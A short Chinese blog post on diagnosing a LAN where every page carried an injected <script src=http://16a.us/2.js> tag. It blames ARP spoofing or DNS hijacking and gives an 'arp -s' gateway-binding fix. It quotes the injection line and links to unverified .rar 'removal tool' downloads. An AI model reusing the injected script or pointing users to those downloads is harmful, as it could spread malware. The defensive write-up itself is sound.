公司局域网访问所有页面都加上了<script src=http://16a.us/2.js></script>代码,
这次是客户端打开的所有网页,故可排除是服务器环境遭遇arp欺骗,综合网上各方意见,得出结论:本地网关或dns被劫持,修复本地连接后故障消除。
根本解决方法,绑定网关mac地址,方法为:
命令行输入arp -s 网关IP 网关MAC
关于网关MAC,可使用arp命令查询。
如果是dns被劫持,则更改dns服务器。

关于js加密解密的两篇文章,想研究上面病毒脚本的朋友可能用得着
http://bbs.blueidea.com/viewthread.php?tid=2665835&page=1#pid2702392

http://bbs.blueidea.com/viewthread.php?tid=2440360

16a.us专杀工具下载地址:
http://free.ys168.com/infile/note/note_6.htm?http://ys-H.ys168.com/?killvirus.rar_72e7bspnnht1bkp0c0c0com1biu14z97f1o0bsjtpm4z

http://hzyo.com/killvirus.rar

以上就是【解决http://16a.us/2.js之arp欺骗的方法附专杀工具】的全部内容了,欢迎留言评论进行交流!

赞(0) 踩(0)

与本文相关的软件

发表我的评论

最新评论

  1. 暂无评论